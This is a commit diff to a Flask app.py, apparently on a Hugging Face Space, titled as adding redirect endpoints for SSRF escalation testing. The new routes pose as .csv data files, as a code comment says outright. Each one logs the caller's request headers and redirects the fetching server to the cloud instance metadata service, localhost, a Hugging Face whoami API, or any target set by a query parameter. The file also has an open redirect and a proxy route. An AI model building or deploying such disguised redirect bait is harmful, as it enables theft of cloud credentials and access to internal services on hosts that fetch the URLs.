aaxaxax commited on
Commit
d930fc3
·
1 Parent(s): ba12e64

Add redirect endpoints for SSRF escalation testing

Browse files
Files changed (1) hide show
  1. app.py +67 -2
app.py CHANGED
@@ -1,4 +1,4 @@
1
- from flask import Flask, request, jsonify, redirect, Response
2
  import requests, os, socket, json, time
3
 
4
  app = Flask(__name__)
@@ -23,7 +23,7 @@ def log_request():
23
 
24
  @app.route('/logs')
25
  def show_logs():
26
- return jsonify(LOG[-50:])
27
 
28
  @app.route('/clear-logs')
29
  def clear_logs():
@@ -50,6 +50,71 @@ def redir():
50
  code = int(request.args.get('code', '302'))
51
  return redirect(target, code=code)
52
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
53
  @app.route('/mcp-proxy', methods=['GET', 'POST'])
54
  def mcp_proxy():
55
  target = request.args.get('target', '')
 
1
+ from flask import Flask, request, jsonify, redirect, Response, make_response
2
  import requests, os, socket, json, time
3
 
4
  app = Flask(__name__)
 
23
 
24
  @app.route('/logs')
25
  def show_logs():
26
+ return jsonify(LOG[-100:])
27
 
28
  @app.route('/clear-logs')
29
  def clear_logs():
 
50
  code = int(request.args.get('code', '302'))
51
  return redirect(target, code=code)
52
 
53
+ # Redirect endpoints disguised as data files for SSRF testing
54
+ @app.route('/redir-metadata.csv')
55
+ def redir_metadata():
56
+ entry = {
57
+ 'time': time.time(),
58
+ 'method': request.method,
59
+ 'path': request.full_path,
60
+ 'headers': dict(request.headers),
61
+ 'remote_addr': request.remote_addr
62
+ }
63
+ LOG.append(entry)
64
+ return redirect('http://169.254.169.254/latest/meta-data/', 302)
65
+
66
+ @app.route('/redir-metadata-v2.csv')
67
+ def redir_metadata_v2():
68
+ entry = {
69
+ 'time': time.time(),
70
+ 'method': request.method,
71
+ 'path': request.full_path,
72
+ 'headers': dict(request.headers),
73
+ 'remote_addr': request.remote_addr
74
+ }
75
+ LOG.append(entry)
76
+ # IMDSv1 - different path
77
+ return redirect('http://169.254.169.254/latest/user-data', 302)
78
+
79
+ @app.route('/redir-internal.csv')
80
+ def redir_internal():
81
+ entry = {
82
+ 'time': time.time(),
83
+ 'method': request.method,
84
+ 'path': request.full_path,
85
+ 'headers': dict(request.headers),
86
+ 'remote_addr': request.remote_addr
87
+ }
88
+ LOG.append(entry)
89
+ # Try to hit HuggingFace internal API
90
+ return redirect('http://huggingface.co/api/whoami', 302)
91
+
92
+ @app.route('/redir-localhost.csv')
93
+ def redir_localhost():
94
+ entry = {
95
+ 'time': time.time(),
96
+ 'method': request.method,
97
+ 'path': request.full_path,
98
+ 'headers': dict(request.headers),
99
+ 'remote_addr': request.remote_addr
100
+ }
101
+ LOG.append(entry)
102
+ return redirect('http://localhost:8080/', 302)
103
+
104
+ @app.route('/redir-target.csv')
105
+ def redir_target():
106
+ """Dynamic redirect - set target via query param"""
107
+ target = request.args.get('t', 'http://127.0.0.1/')
108
+ entry = {
109
+ 'time': time.time(),
110
+ 'method': request.method,
111
+ 'path': request.full_path,
112
+ 'headers': dict(request.headers),
113
+ 'remote_addr': request.remote_addr
114
+ }
115
+ LOG.append(entry)
116
+ return redirect(target, 302)
117
+
118
  @app.route('/mcp-proxy', methods=['GET', 'POST'])
119
  def mcp_proxy():
120
  target = request.args.get('target', '')